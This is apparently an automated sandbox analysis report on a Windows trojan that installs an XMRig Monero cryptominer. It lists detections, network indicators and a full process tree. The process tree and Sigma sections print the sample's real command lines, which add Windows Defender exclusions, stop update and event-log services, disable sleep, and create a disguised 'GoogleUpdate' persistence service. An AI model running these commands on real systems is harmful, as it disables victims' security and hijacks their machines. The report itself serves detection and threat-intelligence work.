Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe
Analysis ID:	1543361
MD5:	c441be4f7fd0f07fdcf94657c624c3da
SHA1:	bedd1f5d2feb959599b370590f62f02cbb3d2d3f
SHA256:	47c6484dde4d9ca23a7667b1b71c5ed88d7cdd3dccf57485333ceda0153e5684
Tags:	exe
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Disable power options

Sigma detected: Stop EventLog

System process connects to network (likely due to code injection or exploit)

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to a pastebin service (likely for C&C)

DNS related to crypt mining pools

Found direct / indirect Syscall (likely to bypass EDR)

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Modifies the hosts file

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses powercfg.exe to modify the power settings

AV process strings found (often used to terminate AV products)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe" MD5: C441BE4F7FD0F07FDCF94657C624C3DA)

powershell.exe (PID: 7704 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 8044 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 7960 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8036 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8092 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8140 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 8188 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7288 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7320 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 7404 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 4404 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7444 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7436 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7540 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5880 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Updater.exe (PID: 6552 cmdline: C:\ProgramData\GoogleUP\Chrome\Updater.exe MD5: C441BE4F7FD0F07FDCF94657C624C3DA)

powershell.exe (PID: 6828 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1528 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 2176 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

sc.exe (PID: 3208 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2288 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2800 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 2916 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 2988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 4004 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 6100 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 4084 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 3996 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 4332 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 7744 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000003B.00000002.3836485970.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003B.00000003.1503060227.0000000001A07000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003B.00000002.3836485970.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003B.00000002.3836485970.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000003B.00000003.1503060227.00000000019FD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: explorer.exe PID: 7744	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 4 entries

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, ParentProcessId: 7652, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7288, ProcessName: powercfg.exe

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, ParentProcessId: 7652, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7704, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, ParentProcessId: 7652, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto", ProcessId: 7436, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, ParentProcessId: 7652, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7704, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, ParentProcessId: 7652, ParentProcessName: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7540, ProcessName: sc.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe

Avira: detection malicious, Label: TR/Kryptik.ilfwl

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe

ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

ReversingLabs: Detection: 60%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0000003B.00000002.3836485970.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000003.1503060227.0000000001A07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.3836485970.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.3836485970.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000003.1503060227.00000000019FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7744, type: MEMORYSTR

DNS related to crypt mining pools

Source: unknown

DNS query: name: xmr-eu1.nanopool.org

Source: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Updater.exe, 00000022.00000003.1474645165.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp, pjjtwoljkwri.sys.34.dr

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 54.37.137.114 10343	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.20.4.235 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 51.89.23.91 10343	Jump to behavior

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Source: global traffic	TCP traffic: 192.168.2.10:49786 -> 54.37.137.114:10343
Source: global traffic	TCP traffic: 192.168.2.10:49804 -> 51.89.23.91:10343

Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /raw/VMnMCaJF HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6

Source: global traffic	DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C8B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C8B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp, Updater.exe, 00000022.00000003.1474251124.0000027AE3C8B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl/
Source: explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.cloudflare.com/origin_ca.crl7
Source: Updater.exe, 00000022.00000003.1474645165.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp, pjjtwoljkwri.sys.34.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: Updater.exe, 00000022.00000003.1474645165.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp, pjjtwoljkwri.sys.34.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: Updater.exe, 00000022.00000003.1474645165.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp, pjjtwoljkwri.sys.34.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: Updater.exe, 00000022.00000003.1474645165.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp, pjjtwoljkwri.sys.34.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C8B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C8B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp, Updater.exe, 00000022.00000003.1474251124.0000027AE3C8B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_ca
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
Source: explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.cloudflare.com/origin_cai
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp, Updater.exe, 00000022.00000003.1474251124.0000027AE3C8B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C8B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C8B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: Updater.exe, 00000022.00000003.1474251124.0000027AE3C80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/VMnMCaJF
Source: explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/y9ce3ing/raw
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/y9ce3ing/raw--cinit-stealth-targets=Taskmgr.exe
Source: explorer.exe, 0000003B.00000003.1477292624.0000000000F02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/y9ce3ing/rawTaskmgr.exe
Source: explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/y9ce3ing/rawc
Source: explorer.exe, 0000003B.00000003.1503146567.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3836485970.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/y9ce3ing/rawox.dll

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443

Spam, unwanted Advertisements and Ransom Demands

